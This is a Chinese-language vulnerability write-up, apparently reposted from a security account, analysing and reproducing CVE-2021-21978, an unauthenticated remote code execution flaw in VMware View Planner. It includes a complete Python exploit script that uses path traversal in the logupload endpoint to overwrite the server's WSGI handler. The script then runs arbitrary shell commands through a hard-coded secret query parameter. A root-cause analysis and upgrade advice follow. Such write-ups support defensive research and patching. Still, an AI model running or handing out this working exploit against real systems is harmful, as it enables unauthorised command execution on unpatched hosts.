CVE-2021-21978:VM View Planner RCE分析复现
CVE-2021-21978:VM View Planner RCE分析复现
View Planner是VMware官方推出的一款针对view桌面的测试工具,通过这个测试工具可以估算出在指定的应用环境下可以发布多少个view桌面。
0x02 漏洞概述
编号:CVE-2021-21978 View Planner 的logupload端点缺乏输入验证,导致具有查看View Planner Harness网络访问权限的未经授权的攻击者可以上载和执行精心编制的文件,从而导致在logupload容器中执行远程代码。
0x03 影响版本
VMware View Planner <= 4.6.0
0x04 环境搭建
环境地址:
链接: https://pan.baidu.com/s/1fE69BWvjGNaZIuggIhVabg
提取码: mxpd下载后直接导入到虚拟机
最后界面为如下图
0x05 漏洞复现
EXP地址:
https://github.com/skytina/CVE-2021-21978VMware View Planner Web管理界面存在一个上传日志功能文件的入口,没有进行认证且写入的日志文件路径用户可控,通过覆盖上传日志功能文件log_upload_wsgi.py
# -*- coding: utf-8 -*-
# @Time : 2021/3/5 下午1:38
# @Author : skytina
# @File : CVE-2021-21978.py
import requests,json,sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def exploit(url):
payload_fname = 'upload.txt'
logMetaData = {
"itrLogPath":"../../../../../../etc/httpd/html/wsgi_log_upload",
"logFileType":"log_upload_wsgi.py",
"workloadID":"2"
}
vul_path = '/logupload?logMetaData={logMetaData}'.format(
logMetaData=json.dumps(logMetaData)
)
# with open('./upload.txt','r') as f:
# with open(payload_fname,'w+') as wf:
# command_to_execute = "{command} > /etc/httpd/html/logs/.debug.log"\
# .format(command=command)
# content = f.read()
# content_w = content.replace(
# "{command_to_execute}",command_to_execute
# )
# wf.write(content_w)
req_url = "{url}{vul_path}".format(
url = url,
vul_path = vul_path
)
files = {
"logfile":open(payload_fname,"r")
}
try:
r = requests.post(req_url,files=files,verify=False)
#print(r.content.decode())
cmd_r = cmd(url,'echo "NiuNiu2020" |base64')
#print(cmd_r)
if "Tml1Tml1MjAyMAo=" in str(cmd_r):
return True
else:
return False
except Exception as e:
print(str(e))
return False
def cmd(url,command):
cmd_url = "{url}/logupload?secert=NiuNiu2020&command={command}".format(
url=url,
command=command
)
try:
resp = requests.get(cmd_url,verify=False)
return resp.content.decode()
except Exception as e:
return str(e)
def usage():
help = "[*] python3 CVE-2021-21978.py url\n\tpython3 CVE-2021-21978.py https://192.168.80.3"
print(help)
#exploit('https://192.168.80.3','whoami')
if __name__ == "__main__":
if len(sys.argv) < 2:
usage()
else:
url = sys.argv[1]
if url.startswith("http://") or url.startswith("https"):
if exploit(url):
cmd_url = "{url}/logupload?secert=NiuNiu2020&command={command}".format(
url=url,
command="command"
)
outmsg = "[*]{url} is vulnerable\n[*]You can execute command like This: {cmd_url}".format(
url = url,
cmd_url=cmd_url
)
print(outmsg)
else:
usage()
0x06 漏洞分析
可以看到apache 配置文件配置了logupload端点的指向文件为
/etc/httpd/html/wsgi_log_upload/log_upload_wsgi.py
其路径/etc/httpd/html/ 实际是容器内的路径,对应宿主机的/root/viewplanner/httpd
定位到
/root/viewplanner/httpd/wsgi_log_upload/log_upload_wsgi.py文件
由于缺少路径规范过滤,只需要稍微构造一下数据包即可上传恶意文件到任意路径,从而可以覆盖log_upload_wsgi.py 文件,达到远程代码执行的效果
0x07 修复方式
升级到最新版本。
参考链接:https://paper.seebug.org/1495/
https://github.com/skytina/CVE-2021-21978
https://mp.weixin.qq.com/s/mBL9kYptreo62g4IonXSLg
本文分享自 Timeline Sec 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!
腾讯云开发者
